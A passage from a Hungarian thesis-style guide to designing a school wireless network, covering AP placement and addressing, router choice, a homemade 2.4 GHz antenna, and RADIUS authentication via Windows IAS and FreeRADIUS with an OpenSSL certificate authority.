Első lépésként felmértem a lehetséges felhasználók számát, és az igényeket a leendő vezeték nélküli hálózattal kapcsolatban. Fel kellett térképeznem az épületet az Access Pointok elhelyezésének szempontjából, illetve el kellett végeznem a vizsgálatokat az eszközök hatótávolságáról.

A részletes kivitelezés csak ezután történhet meg. A helyszíni felmérést segítségünkre lesz abban, hogy képet kapjunk az épület és annak környezetének rádiófrekvenciás telítettségéről, (RF) terület jellemzőiről, amelyek befolyásolhatják a kiépíteni kívánt WLAN hálózatunk működését.

A mérés során az úgynevezett rádiófrekvenciás mérési pontokat kell felvennem a Wisiwave program által azokon a helyeken, ahol az Access Point jelenlegi pozíciója lesz. Mindenképpen tartuk szem előtt a felhasználói igényeket, azaz mely területre szükséges biztosítanunk a WLAN hálózatunk lefedettségét. Az RF vizsgálat célja hogy megtudjuk, határozni a program segítségével WLAN hálózatunk csomópontjait, és megismerjük az esetlegesen zavaró körülményeket, amely hatással lehet a WLAN hálózatunk működésére. A lefedettség méréséhez készítsünk, vagy ha birtokunkban van, használjunk méretarányos alaprajzot az épületről.

A kiépíteni kívánt WLAN hálózat alapvető feladata, hogy megfelelő rádiófrekvenciás lefedettséget biztosítson az intézmény telephelyeinek meghatározott területein (osztálytermek, tanári, iroda)

helységek a mobil kliensek számára. A mobil kliensek lehetnek külsős, azaz vendégek által hozott laptop vagy csak az iskola dolgozóinak laptopjai.

A hozzáférési pontok IP címeit az alábbi táblázatban foglalom össze:

A hálózat címei:

Hálózati azonosító:	192.168.20.0
Maszk:	255.255.255.128
A hálózat címtartománya:	192.168.20.1-192.168.20.150
Broadcast	192.168.20.255

Az AP-k címei:

Földszint

AP1_Földszint_	192.168.20.1
AP2_Földszint_	192.168.20.2
AP3_Földszint_	192.168.20.3
AP4_Földszint_	192.168.20.4
AP5_Földszint_	192.168.20.5

Emelet1:

AP6_Emelet_	192.168.20.6
AP7_Emelet_	192.168.20.7
AP8_Emelet_	192.168.20.8
AP9_Emelet_	192.168.20.9

Emelet2 (Iroda)

AP7_Emelet	192.168.20.10
AP7_Emelet	192.168.20.11
AP7_Emelet	192.168.20.12
AP7_Emelet	192.168.20.13
AP7_Emelet	192.168.20.14
AP7_Emelet	192.168.20.15

A tervezés során az alábbi felhasználói igényeket vettem alapul:

- Szabadon használható frekvenciasáv
- Új szabványok támogatása,
- AP-k felhasználói, igények alapján bővíthető legyen.

Tehát az Access Point az RF mérés alapján került elhelyezésre. A mérés során kiderült, hogy 4 illetve 6 db AP-val biztonságosan lefedhető a teljes terület, és az egyes AP-k által lefedett területek között megfelelő átfedéseket tapasztaltam.

Az alaprajzon az (AP) ikon az Access- Pointok helyét jelölik. Az eddigi tapasztalatok során, ha olyan épülettel lenne dolgunk, amely több szintes (főleg vasbeton esetében), illetve sok a válaszfal a helységek között, szinte biztos, hogy nem lesz elég egyetlen router vagy Access Point, mert hatósugaruk a távolsággal és a közbe eső akadályokkal egyre inkább csökken. Ez általában akkor derül ki, amikor már megvettük az elégségesnek gondolt eszközöket, majd szomorúan tapasztaljuk, hogy néhány közfallyal, vagy a távolság növelése esetén nem lehet csatlakozni a hálózathoz. Ebben az esetben építsünk be egy újabb Access Pointot. Mivel épületünk több szintes így több AP kell a megfelelő lefedettséghez

WLAN rendszerünk tervezésekkor figyelembe kívánom venni, hogy központi menedzselésű legyen a rendszer. Az iskola felhasználóinak azonosítását egy központi szerver, úgynevezett rádiusz szerver fogja végezni a vezeték nélküli hálózatban amelynek feladata hogy megvizsgálja hogy a felhasználó jogosult –e az iskola vezeték nélküli hálózatát használni az internet eléréséhez. Ha a felhasználó jogosult a vezeték nélküli hálózat használatára a kliens számítógép kap egy IP címet, amelynek alapján jogosult az iskola WLAN hálózatának használatára.

3.1.2 Router típusok (jelterjedésük) a megfelelő router kiválasztása

Hálózatunk kiépítéséhez tekintsünk meg néhány WLAN routert hogy el tudjuk dönteni, hogy melyiket, kívánjuk felhasználni.

- Linksys WLAN router
- beépített ADSL modem
- 4 portos Switch
- WLAN IEEE 802.11g 54Mbit/s
- beépített Firewall
- T-DSL kompatibilis

-HATÓTÁV ~ 100 M
-2.4 GHz-es frekvencia (szabvány)

25. ábra Linksys router

4

D-Link DI-524 54Mbps WLAN router

54Mbit adatátviteli sebesség
4 portos router

26. ábra D-link router

Egy IEEE802.11g szabvány szerinti 54Mbit hozzáférési pont, egy akár 253 felhasználó számára egyetlen előfizetéssel Internet kapcsolatot biztosító gateway és egy 4 portos NWay switch ötvözete. A 4x 10/100Mbit NWay port egy kisebb helyi vezetékes LAN kialakítására is lehetőséget nyújt.

Belkin F5D7231-4P

- **Márkanév:** Belkin
- **Típus:** F5D7231-4P
- **Hardver Platform:** PC, Mac
- **Kapcsolatok átvitel:** Vezeték nélküli, vezetékes
- **Hálózat Téma:** Vezeték nélküli router
- **Data Link Protokoll:** Ethernet, Fast Ethernet, IEEE 802.11b, IEEE 802.11g
- **Hálózati Transzport Protokoll:** TCP / IP, AppleTalk, PPTP
- **Hálózati adatátviteli sebesség:** 125 megabit / másodperces

27. ábra Belkin router

- Beépített 4-portos 10/100 Ethernet Switch
- Beépített NAT / SPI tűzfal
- Biztonság - 64 - és 128-bites WEP adattitkosítás, WPA TKIP és AES +
- Használata 802.11g érhet el akár 54Mbps
- Visszafelé kompatibilis a 802.11b berendezések adatátviteli sebesség akár 11 Mbit/s

Vizsgálva a lehetőségeket a Belkin került ki győztesen, mert ez felelt meg leginkább a felhasználói igényeknek. Szükség van nyomtató szerverre, funkcióra is amit a Belkin router tartalmaz.

3.1.3 Wifi antenna készítése házilag

Mielőtt bármihez is hozzáfognánk, vizsgáljuk meg a környezeti tényezőket a két pont között (adó-vevő). Mivel 2,4 GHz-es rádióhullámok segítségével történik az adatátvitel, ezért zavaró tényező lehet az időjárás, vagy bármi, ami útjába áll a jelnek pl. háztömb, fa, bokor stb. Vegyük figyelembe ezeket a tényezőket, mert sok esetben egyáltalán nem lesz jelünk. Az előzetes terepszemle és mérések után elkezdhetjük az eszköz elkészítését.

Antenna készítése:

Szükséges eszközök

- 110x110mm négyzet alakú fémlemez (alumínium vagy réz)
- 50mm hosszúságú fél colos rézdrót
- Rövid hosszúságú CNT-400 vagy LMR-400 alacsony veszteségű coax (~300mm hosszú)
- 250mm 2.5mm² rézdrót (kb. 1.5mm átmérővel)
N csatlakozó
- Vegyünk egy darab rézdrótot, amit majd több ponton meg kell hajlítani

Az általam használt darab eltért az interneten fellelhető instrukcióktól (elvileg 1,5mm-es átmérővel kellett volna rendelkeznie), ugyanis csak 2,5mm-es kábelt találtam, de ez is jól szerepelt a teszten. Egy darab N aljzatra lesz szükségünk. A legtöbb számítástechnikai, vagy elektronikai üzletben beszerezhető.

28. ábra N aljat

Egy kis jelvesztésű kábel. Jómagam a H155 jelzésű, 50 Ohm-os kábelt javaslom, de lehet mást is. Ilyen kábel pl.: a H500, a H1000, vagy az RG58, stb. Furcsa mód működik a dolog pl. egy sima 70-75 Ohm-os "régi", BNC-s hálózati kábellel is, de ez nagyon csillapítja a jelet, ezért szerintem ez csak pár méterre jó.

29. ábra H155 kábel

Kettő darab dugót, kell a kábel egy-egy végére elhelyezni. Az egyik egy N dugó, ami majd az antenna felől csatlakozik, a másik egy SMA (feltéve, hogy ez van a kártyádon) dugó, ami a WLAN kártya antennakivezetésére kerül. Ez szintén beszerezhető.

Telepítsünk a gépünkbe egy WLAN hálózati kártyát, ha ezzel jelenleg nem rendelkezünk.

A drótot nem kell előre méretre vágni, hiszen a hajlítgatás során méretre fog "alakulni", és ráérünk a végén levágni a maradékot. Ha csak egy meglehetősen régi, eloxidálódott darab akadt a kezünk ügyébe, akkor gondjaink lehetnek a forrasztással a későbbiekben. Ezért mielőtt nekilátnánk a dolognak, alaposan tisztogassuk meg, mondjuk egy dörzspapír segítségével, mert egyenes állapotában ezt könnyebb megtenni.

30. ábra Dróthajlítás

31. ábra WLAN antenna szerkezete

A drótot megfogjuk egy fogóval egy ponton, és 90 fokban meghajlítjuk. Az így kialakítandó oldalak hosszának 30.5 - 32 mm-nek kell lenniük, de szerintem ezt házilag nagyon nehéz pontosan elérni. Ha jó a kézügyességünk, akkor egy jó fogóval, sikerülni fog a dolog, még ha nem is lesz egészen pontos.

32. ábra Dróthajlítás

Ha megvagyunk a hajlítgatással, akkor ki kell fűrni a reflektort, hogy az N aljzat beleférjen. Elvileg mindegy hogy hol fűrjük ki, de tanácsos aránylag középen! Mint azt már fentebb említettem, a reflektor az a tükröző felület, ami az antennára veri vissza a beeső jelet. Tulajdonképpen ez lesz az a felület, amire az antennát rögzítjük. Az anyaga tetszőleges (Egyszerű fémlemez, Alumínium, Stb..) lehet, de mindenképpen valami fémes!

33. ábra WLAN antenna nyáklemeze

Véleményem szerint egy darab nyáklemez (Elektronikai szereléshez használt réz felületű lemez) jó választás, de érdemes lekezelni valamiféle felületvédő anyaggal, ami nem nyeli el a rádióhullámokat, elkerülendő az oxidációt. Személy szerint én alumínium lemezről oldottam meg, ami azért is jó, mert nem oxidálódik.

Ezek után a csatlakozó közepébe bele kell forrasztanunk egy darabot az elején használt darab drótból. Ez lesz a számárvezetők, amihez majd hozzá kell forrasztani az antennát. Ez most még tetszőleges méretű lehet, de 18mm-nél ne legyen rövidebb! Célszerű egy hosszabb, 10-20 centis darabbal kezdeni, és majd a végén levágni a fölösleges részt.

A forrasztást úgy kell végezni, hogy a meghajlított antenna egyik belső szegletét kell az előbb említett számárvezetőhöz rögzíteni a reflektortól 18mm-re. Ha sikerült hozzáforrasztani, és a maradékot levágni, akkor a másik belső szegletet a reflektorhoz kell kapcsolni valamely módon. Én ezt úgy oldottam meg, hogy a hajlítgatás során nem vágtam le pontosan a drótot, amikor összeért a két vége, hanem ráhagytam 2 centit. Ott, ahol összeért a drót, össze kell forrasztani, hogy egy "kört" alkosson. Ennél a pontnál hajlítottam le a maradékot, majd forrasztottam hozzá egy forr csúcshoz (olyan, mint egy alátét, csak az egyik oldalán "kilóg" egy 4-6mm-es darab, amihez hozzá lehet forrasztani egy kábelt). Ha minden jól ment, akkor valami hasonlót kell látni a kezünkben, mint a fenti képen.

34. A kész antenna

A tesztelést a Cantenna-nál leírtakkal megegyező módon végeztem, ami tulajdonképpen azért nem volt nehéz, mert még mind a mai napig az ott leírt antennát használja az internetezéshez, ezért csak ki kellett cserélnem a két eszközt. A 70-75%-os jel szerintem elég tűrhető, tekintve hogy első próbálkozásról, és amatőr, házilag összerakott antennáról van szó.

35. ábra Parabola antenna

Vizsgálati eredmények

Mérési jegyzőkönyv:

A fenti antenna viszonylag könnyen elkészíthető. Ha egy parabolaantennával egészítsük ki a megépítést, akkor akár egy 20 dBi is lehet az antenna. A fémes felület által lehetővé válik a csillapítás. Az antennák kétféleképpen lehetnek. Irányított és irányítatlan. A körsugárzó antennák körkörösén sugározzák a jelet. A jó körsugárzó működéséről elmondható hogy minden irányban sugározza a jelet. Irányított antenna alkalmazásának esetén a keskenyebb a nyaláb. Az antenna ~11 dBi nyereségű. Ez a nyereség az antenna helyzetétől is függ.

A házilag elkészített antennára nem tudtam elvégezni a méréseket, mert a méréshez szükséges technikai eszközök nem álltak a rendelkezésemre. A szükséges műszer igen drága.

Működési leírás

Ebbe a részben szeretném leírni a tervezett WLAN hálózat működését. A fizikai kiépítés tervrajzai alapján készült el a hálózat kiépítése a felhasználói igények alapján. Minden emeleten elhelyeztem az AP-kat a lefedettség érdekében. Egy WLAN routerhez kapcsoltam az internetet hogy megosszam, majd ezt csatlakoztattam az egyik kapcsolóhoz, amelyre AP-k vannak csatlakoztatva. Az emelet1-en lévő kapcsolóba csatlakozik a Rádiusz szerver, valamint a földszinten lévő Sulinet expressz szekrény is. Amint a rajzból is látható a hálózathoz való csatlakozást, azaz a hálózat hitelesítését a Rádiusz szerver fogja végezni.

A Rádiusz szerver működése:

A hitelesítési eljárás azzal fog indulni, hogy a kliens a Rádiusz szerver felé küld egy választ. A kliens pedig a Rádiusz kliens oldali változattal van ellátva. Az eljárás többféle protokollon működhet CHAP (Challenge Handshake Authentication Protocol). Ez lehetővé teszi az üzenetek titkosítását. A kliens összeállítja a küldeni kívánt csomagot a szerver felé, amely tartalmazza a felhasználó nevét, jelszavát, valamint a Rádiusz kliens azonosítója és port címe. A jelszót MD5 eljárással titkosítva lesz a CHAP protokoll segítségével. A kliens által elküldött csomag továbbítódik a szerverre, ha nincs válasz a szervertől, akkor a kérés megismétlődik egy adott idő után. Ha nem csak egy Rádiusz szerverünk lenne a hálózatban, hanem több akkor a kérés eljutna egy másik szerverhez is ha az előbbinél nem kapna választ a kliens. Minden esetben a folyamat automatikusan megy végbe, a kiszolgáló keresés a kliensre tekintve.

Tegyük fel hogy a Rádiusz szerver fogadta a kliens kérését. Ekkor a kiszolgáló ellenőrzést végez a kérésre a kliens beazonosítása érdekében. Ha folyamat kimenetele rendben van abban az esetben a felhasználó nevét, meg kell keresni a rendszer adatbázisában.

Ha megvan a keresett információ akkor dekódolásra kerül a jelszó, és ellenőrzés alá kerül a kliens jelszava. Ha itt is minden rendben találunk, akkor már csak a kliens jogosultságán múlik hogy megkapja –e az engedélyt a bejelentkezéshez a hálózatba. Ha a jogosultság nincs meg attól függően, hogy rendelkezik, vele a kliens számára akkor ebben az esetben a szerver egy csomagban fogja elküldeni a kliens felé a bejelentkezés elutasítását vagy elfogadását.

4.1 Kivitelezés, tesztelés (Fizikai kiépítés)

A vezeték nélküli eszközökkel való ismerkedés után lássunk neki a hálózatunk megépítéséhez. Nyilvánvaló hogy a fizikai kiépítés előtt, egy hálózati tervet kell készítenünk, amely alapján el tudjuk végezni a fizikai kiépítést. Egy Rádiusz szervert is kell építenünk. Erre a célra megfelel egy asztali PC.

A felhasznált eszközökről és a kiépítéshez szükséges software és hardware szükségletekről már említést tettem. Az alábbi ábrán látható hogy milyen lesz hálózatunk kapcsolódási pontjai. A hálózati terv készítése segítette elképzelni WLAN hálózat kiépítését.

36. ábra A tervezett WLAN hálózatunk fizikai terve

A kiépítéshez használt eszközök és a felhasználói követelmények függvényében már megtudjuk, határozni a hálózatunk kiépítéséhez szükséges eszközök darabszámát és helyzetét. A technikai elvárások alapján a legalkalmasabb hozzáférési pont a Belkin F5D7231-4P. A hálózat fizikai kiépítésekkor az Access Pointokat saját magam építettem ki, biztosítottam hozzá a tápellátást. A hálózat nyílt elérése végett szükségesnek tartottam, hogy telepítsek egy szerver számítógépet is (Rádus), amelynek feladata, hogy korlátozza az iskola internet elérését, azaz csakis az arra jogosult felhasználónak engedje meg a WLAN használatát a hitelesítési eljárásnak köszönhetően. Hálózatunk kiépítésekkor az AP-kat olyan helyen kell elhelyezni, amely könnyebben elérhető legyen karbantartás szempontjából is.

Az AP-nak áramforrást, az UTP kábel érpárain keresztül az úgy nevezett (Power On Ethernet) keresztül, kapja. Az AP telepítését a következőképpen végeztem el. Először az előzetes tervek alapján, amely a helyszíni felmérést vette alapul, elhelyeztem az AP-kat a kívánt helyre. A vezetékes hálózat központi helységéből UTP Cat6-os kábeleket vezettem az AP pontjáig. Az AP-hoz vezetett UTP kábeleket kábeltartó profilokba tettem. Ez után a tesztelés következett, hogy megbizonyosodjak az AP-k működéséről. Az AP-k tesztelése után beállítottam a szerver gépen a DHCP, gateway funkciókat, majd ezután a hálózatot tesztüzembe állítottam. A beállított szerver DHCP segítségével osztja ki az IP címeket a kliens számára. A DHCP funkciót azért tartom előnyösnek itt, mert lehetőségem van arra, hogy meghatározzam, hogy milyen tartományban legyen az IP címkiosztás, illetve, hogy hány kliens kapcsolódjon a hálózathoz. Azért állítottam fel egy szervert erre a feladatra, mert így a rendszer jobban kontrolálható. Access Pointok saját DHCP funkcióját inaktíváltam. A Rádus szerverbe két hálózati kártyát telepítettem, az egyik hálózati kártya kapcsolódik az internethez, a másik pedig egy switch segítségével kapcsolódik az Access Pointok-hoz. A szervernek van egy gateway funkciója is, hogy a WLAN hálózatunk forgalmát továbbítani tudjuk az internet felé.

Ezt Linux esetében egy úgynevezett ipchains segítségével tudjuk elérni. Szerverünk NAT funkciót (Network Access Translation) is végez, ami azt jelenti, hogy egy IP címen kerül összekötésbe lokális hálózatunk az internettel. A lokális hálózaton az eszközök számára IP címeket oszt ki a DHCP szerver. Ez a tartomány a 192.168.1.10/255.255.255.0.

Azért kívánok Nat-ot használni, mert az internet irányából érkező támadások esetén a kliensek rejtve maradnak. Az iptables segítségével pedig módosítani tudom a tűzfal szabályokat is. A célunk az hogy WLAN hálózatunk egy központi szerveren futó szolgáltatás segítségével oldjuk meg a hálózathoz csatlakozni kívánó felhasználók korlátozását.

De hogyan is konfiguráljuk a szerverünket?

Először is a Rádus szervert azért is tartom jó megoldásnak a hálózatunk illetéktelen behatolása elleni védelem szempontjából, mert támogatja a hitelesítést szerver oldalról illetve a hozzáférési pontok konfigurációját.

A Rádiusz szerver telepítése

Windows operációs rendszer telepítése esetén

A munkahelyemen jelenleg is üzemel egy Windows 2003 szerver, amit szeretnék felhasználni rádiusz szerverként is. Így lehet a legjobban megoldani, hogy egy egységes központosított legyen a hozzáférés a felhasználók számára a hálózathoz.

A hitelesítés a hálózati felhasználók számára egyre fontosabb, hogy támogassa az informatikai biztonságot. A rádiusz szerver a távoli felhasználót hitelesíti. Ezt fel lehet használni minden olyan hálózaton ahol szükség, van egy központosított hitelesítésre. Győződjünk meg arról, hogy a szerveren az Active Directory és a DNS-szolgáltatás megfelelően, van beállítva. Telepítsük az IAS és a tanúsítvány-kiszolgáló komponenseket.

1. A Microsoft Windows Server 2000 vagy 2003 w / AD.
2. Tanúsítási szerver (vagy, kérhetünk egy igazolást harmadik féltől tanúsítványt hatóság).
3. RADIUS szerver (Windows, vagy Linux operációs rendszeren).
4. Access Point , amely támogatja a WPA és rádiusz hitelesítés.
5. Vezeték nélküli hálózati kártya (asztali gép esetén), laptopba integrálva van
6. Windows XP, Windows 7 , Linux ügyfelek.

Az IAS telepítése

1. Indítsuk el a Vezérlőpultról a Programok telepítése és törlése segédprogramot.
2. Kattintsunk a **Windows-összetevők hozzáadása/eltávolítása** gombra.
3. A **Windows-összetevők varázsló** párbeszédpanelen jelöljük be a **Hálózati szolgáltatások** jelölőnégyzetet, és kattintson a **Részletek** gombra.
4. A **Hálózati szolgáltatások** párbeszédpanelen válasszuk az **Internetes hitelesítési szolgáltatás** elemet, majd kattintson az **OK**, majd a **Tovább** gombra.
5. Ha a rendszer erre felszólít minket, helyezük a Windows Server 2003, Standard Edition; Windows Server 2003 Enterprise Edition vagy Windows Server 2003 Datacenter Edition CD-t a meghajtóba.
6. Végül az IAS telepítése után kattintunk a **Befejezés**, majd a **Bezárás** gombra.
- 7.

Szeretném javasolni, hogy a rádiusz szerveren alakítsunk ki tartomány vezérlőt azaz Domain Controllert, hogy a felhasználók egy központi helyen menedzselhetők legyenek. Először telepítsük az IIS-t a Domain Controlleren a fenti leírás szerint. Miután a szerveren telepítve vannak a tanúsítvány szerver komponensek, be kell állítanunk a szerveren a root CA-t.

A tanúsítvány szerver felállításához, választhatjuk az automatikus tanúsítvány kiosztást is. Regisztráljuk a rendszerben a rádiusz szervert. Ehhez menjünk az Internet Authentication Service-en belül jobb klikk és válasszuk a Register In Service Active Directory. A klienseket is fel kell vennünk a rendszerbe, ahhoz hogy majd kapcsolódhassanak a hálózathoz. Itt kell adnunk az AP IP címét.

A Windows 2003/2008 szerver alapértelmezetten nem telepíti az extra szolgáltatásokat. Ennek tudatában ahhoz, hogy létrehozzunk egy rádiusz szervert Windows szerver környezetben a Windows szervertelepítő cd-ről kell manuálisan ezt megtennünk. Ahhoz hogy telepítsük az IAS-t egyszerűen, csak nyissuk meg a Hozzáadás/Eltávolítás programot a vezérlőpultból és válasszuk ki a Remove Windows komponenst. Itt keressük meg a "Network Services".

Mivel nem szeretnénk, hogy mindent feltegyen így kattintsunk a részletekre.

37. ábra Windows komponensek kiválasztása

A gördítő sáv segítségével megkereshetjük a IAS szolgáltatást azaz a „Internet Authentication Service.

38. ábra Internet Authentication Service kiválasztása

39. ábra IAS tulajdonságai

Amint feltelepítettük az IAS szolgáltatást eltudjuk, indítani a Vezérlőpultból vagy a Start menüből. Most pedig állítsuk be a IAS-t. Kattintsunk a tulajdonságra.

Az ábrán láthatjuk a IAS Port. Ha bejelöljük a két védjegy ellenőrzést itt, akkor az IAS sikeresen jelentkezik és elutasítja hitelesítési kérelmeket a Windows Eseménynapló. Abban az esetben, ha SQL alapú naplózást akarunk nem szükséges bejelölni a két opciót.

40. ábra Rádiusz port beállítása

Ha rákattintunk a "Ports" fülre, látni fogunk a képernyőn egy listát. Ez lenne az alapértelmezett RADIUS port A Microsoft IAS két porton figyelni. Az 1812 port, a hagyományos port, számot, a Microsoft alkalmazás az úgynevezett sprefer a nagyobb port-számot jelenti. Hagyjuk ezt a beállítást meg alapértelmezettnek.

41. ábra IAS SQL naplózó képesség

Ha kívánjuk, beállíthatjuk az SQL naplózó képességet az IAS számára. Jobb kattintás a Local File-on és tulajdonságok.

42. ábra Az IAS port beállítása

Az első beállításokat lehetőségünk van, hogy a megtörtént eseményeket logoljuk

43. ábra Az IAS naplózás mérete

Ebben a dialógus ablakban be tudjuk állítani a, fájl formátumot valamint a napló méretét.

44. ábra Az IAS log file beállítás

A Log file fülön lehetőségünk van meghatározni a log file elérési útvonalát, a formátumát, a létrehozását a beállított opció alapján valamint a méretét. Nem áll fenn biztonsági kockázat,

mert a hitelesítési és engedélyezési összetevője a Microsoft IAS tökéletesen működik.

45. ábra Az IAS menedzsment konzol

Az IAS telepítése után nyissuk meg az IAS menedzsment konzolt. Az első lépés, hogy létrehozunk, egy rádiusz-ügyfelet ehhez megadjuk az IP címet (vagy a DNS nevet). Adjunk neki nevet, amely látható lesz az IAS menedzsment konzolon. A rádiuszon, szükségünk lesz egy közös jelszóra is. Ezt a jelszót használjuk a rádiusz szerver és a kliens gépeken. Válasszunk egy jelszónak megfelelő erős jelszót.

WLAN kliensek konfigurálása

46. ábra WLAN kliens beállítása

Konfiguráljuk a WLAN kliensünket. A kliensünk Windows XP operációs rendszerrel rendelkezik. Nyissuk meg a hálózati kapcsolatok ablakot majd kapcsoljuk be a vezeték nélküli hálózatot. Ha az Access Point nem érzékeli, a kliens tehát nem talál SSID-t akkor abban az esetben kézzel, kell megpróbálnunk. Tételezzük fel, hogy a kliens felismeri az SSID-t. Ki kell választanunk az SSID-t majd, kattintsunk a tulajdonságok gombra. Itt tudjuk beállítani a hálózati hitelesítés módját és az adat titkosítási algoritmust.

Állítsuk be a WPA és az AES-t. Az AES titkosítás opció kiválasztása alaposan megnöveli a WLAN hálózatunk védelmét. Hogy milyen titkosítást tudunk, választani azt minden esetben a hardver szabja meg.

Kattintsunk a hitelesítés fülre. Győződjön meg arról, hogy a "EAP-típus" értéke "Védett EAP (PEAP)",

Ha megnyitjuk a "Hálózati kapcsolatok" ablakot, észre fogjuk venni, hogy (feltételezve, hogy minden rendben működik) megjelenik az üzenetablakban: "Hitelesítés sikerült", Használatba vehetjük a WLAN hálózatunkat. De mit kell tennünk, ha Linux rendszergazdák, vagyunk és a nyílt rendszerekre építve, szeretnénk biztonságossá tenni WLAN hálózatunkat.

47. ábra WPA AES titkosítás beállítás

Linux WLAN kiépítés

48. ábra Rádiusz linux szerver

Először is vázoljuk fel, hogy el tudjuk képzelni a rendszert. A fentiekben látható fizikai terv alapján fogunk itt is eljárni. A fenti kép csak illusztráció, de ebből is látható a kapcsolódás. A fenti ábrán amint látjuk, baloldalon a szerver helyezkedik el, ami a hitelesítést végzi. Ebben a szerverben 2 db hálókártyát tettem. A Linux világában, mint tudjuk, a hálókártyára nem úgy hivatkozunk, mint Windows esetén, hanem eth0, vagy eth1 néven futnak. A későbbiekben így hivatkozok rá. Amint látható az eth0 kártyáról kapjuk az internet elérést DHCP-n. Képzeljük el hogy az eth1 pedig össze van kapcsolva egy kapcsolóval ami tovább továbbosztja a netet az Access Pointhoz. Végül az Access Pointon keresztül pedig a kliensek el tudják érni a WLAN hálózatot.

Hálózatunk biztonsága védelmére a wep már nem ad megfelelő védelmet, mert a behatoló néhány óra leforgása alatt könnyedén feltörheti WLAN hálózatunkat.

A wpa viszont fejlettebb hitelesítési eljárásokkal rendelkezik. Az alábbiakban szeretném bemutatni, hogy hogyan, tudunk üzembe helyezni egy Linux alapokon épített Wlan hitelesítő kiszolgálót.

Wlan hálózatokban az eszközök között zajló kommunikációt az IEEE 802.1x szabvány írja le. A megosztott erőforrások elérésének feltétele, hogy az ügyfelek hitelesítsék magukat. Linux esetén alkalmazzuk a Free Rádiusz programot, amelyet ingyenesen letölthetünk az internetről. A Free Rádiusz ugyanis az EAP minden fontosabb változatát támogatja, és ugyanolyan üzembiztos és biztonságos. Nézzük, hogyan fog ez működni. Környezetünkben Windows XP kliensek fognak csatlakozni a kiszolgálóhoz. A hitelesítési adatokat a Linux szerver Free Rádiusz kiszolgáló fogja továbbítani a hitelesítést a kliensek felé.

Első körben tételezzük fel, hogy a hardver környezetet már kialakítottuk és már csak a beüzemelés vár. Többféle Linux disztribúció létezik. Én a Debiant választottam. A hitelesítéshez az alap FREE RADIUS csomag is megfelelő. Ha azonban MYSQL adatbázis alapú hitelesítési rendszert kívánunk kialakítani további csomagokra is szükség lehet.

Ha Free Rádiusz csomaggal jelenleg nem rendelkezünk, akkor töltsük le a programot és telepítsük fel a rendszerünkre.

A program letöltése után fordítsuk le. A Free Rádiusz lefordítása nem okozhat nehézséget. Kövessük a leírtakat.

```
./configure-make-make-install
```

 paranccsal történik.

Ha nem vagyunk a programfordításban jártasak, akkor sem adjuk fel, tekintsük meg a forrásprogram INSTALL fájlban leírtakat és a szerint járjunk el.

```
./configure - make - make install
```

 eljárással történik.

A configure és a make parancsot felhasználó módban használjuk. Az telepítéshez ami pl: make install parancshoz pedig root joggal adjuk ki, amelyre szükség is van

A Free Rádiusz program az /usr/local könyvtárba fog települni.

Ha program feltelepült, most hozzuk létre a hitelesítő szervezetet.

Hozzuk létre tanúsítványokat, amelynek létrehozásához úgynevezett hitelesítő szervezet szükséges, amelynek elnevezése CA azaz CA (certificate authority). egy a nyilvános kulcs infrastruktúra gyökereként üzemelő rendszer. Előfordul olyan eset, amikor a tanúsítvány visszavonásra kerül, amely benne van egy visszavonási listában, mert az iskolában már nem dolgozik az a személy. A hozzáférési pont egy Linuxon üzemelő Free Rádiusz kiszolgálónak fogja továbbadni a hitelesítési feladatokat.

A CA üzembe állítása előtt ellenőrizzük le hogy a Linux rendszerünkön rendelkezésre áll az Open SSL. Ezt a wich openssl parancs segítségével tudhatjuk meg. Keressük meg az openssl.cnf fájlt. Ez általában az etc /ssl alatti könyvtárban található meg. Nyissuk meg az openssl.cnf fájlt valamelyik szövegszerkesztő segítségével. Írjuk át az alapbeállításokat.

Az openssl.cnf módosítása optimális tanúsítványkészítéshez

```
# Először módosítjuk a CA a CA_default részben szereplő gyökér elérési útját  
# a létrehozni kívánt CA-nak megfelelően  
[ CA_default ]  
dir = ./micksCA      # Mindent itt tárolunk
```

Az alábbi sorok kicsit lejjebb annak az openssl.cnf -ben:

```
countryName_default = US  
stateOrProvinceName_default = Minnesota  
organizationName_default = Industrial Wiremonkeys of the World
```

Adjunk meg a dir váltózónál egy könyvtárat, amely a CA alapértelmezett könyvtára lesz.

Ezután a CA tanúsítvány állományt nyitottam meg majd, majd a módosítandó sor a következő:
CATOP=./robiCA

Állítsuk be az SSL-t. Adjuk ki az alábbi parancsot.

```
/usr/share/ssl/misc/CA.sh -newca.
```

Ekkor létre tudjuk hozni a gyökértanúsítvány a titkos kulcs jelszavának megadására, amely erős jelszó legyen. A titkos jelszót mindenképpen jegyezzük fel és tegyük biztos helyre. Elvesztés esetén a CA nem tudjuk majd használni.

Az SSL gyökérkönyvtárban lenni kell egy újabb könyvtárnak amely, a fentiekben megadott könyvtárnév azaz „robiCA” néven. Ennek a könyvtárban találjuk a CA nyilvános tanúsítványát.

Ennek a könyvtárnak a gyökérszintjén találjuk új CA-nk nyilvános tanúsítványát, a fájl neve alapesetben cacert.pem. Ezt az állományt másoljuk át a Free Rádiusz kiszolgálóra és a Windows XP illetve Windows 7 kliensekre. Azonban mivel Windows kliensekkel van, dolgunk létre kell hoznunk egy úgynevezett xpeextensions nevű fájlt.

Tartalma xextensions

```
[Xpclient_ext]
extendedKeyUsage = 1.3.6.1.5.5.7.3.2
```

```
[Xpserver_ext]
extendedKeyUsage = 1.3.6.1.5.5.7.3.1
```

Az xextensions fájlra a később szereplő OpenSSL parancsok egy része hivatkozni fog. Ez az állomány ugyanabban a könyvtárba kell lennie, mint az openssl.cnf fájl.

Az OPenSSL használva létre hozzuk a tanúsítványokat minden egyes felhasználóhoz, és ezeket, a tanúsítványokat kell másolnunk az ügyfél gépre.

A tanúsítvány létrehozásakor szükségünk lesz egy kiszolgáló tanúsítványra, amit a Free Rádiusz kiszolgálóhoz illetve ügyféltanúsítványra a hálózatban lévő kliensekhez. Tanúsítványok létrehozása először létre kell hoznunk egy tanúsítványt, amely nincs aláírva. Az aláírási kérvény (CA) kulccsal alá kell írunk, majd a tanúsítványt át kell másolni a kliensre. A kiszolgáló tanúsítvány aláírásának a kérvényét az OpenSSL req parancs segítségével tudjuk létrehozni.

Kulcsok előállítás:

Szerver tanúsítvány kérvény:

```
openssl req -new -nodes -keyout kiszolgáló_kulcs.pem -out kiszolgáló_kérvény.pem -days 730
-config ./openssl.cnf
```

letrejön:

```
kiszolgáló_kerveny.pem aláíratlan tanúsítvány
kiszolgáló_kulcs.pem jelszo nélküli titkos kulcs
common nev a szerver fqdn-je
```

azaz

```
$ openssl req -new -nodes -keyout
_kiszolgáló_kulcs.pem -out kiszolgáló_kerveny.pem
-days 730 -config ./openssl.cnf
```

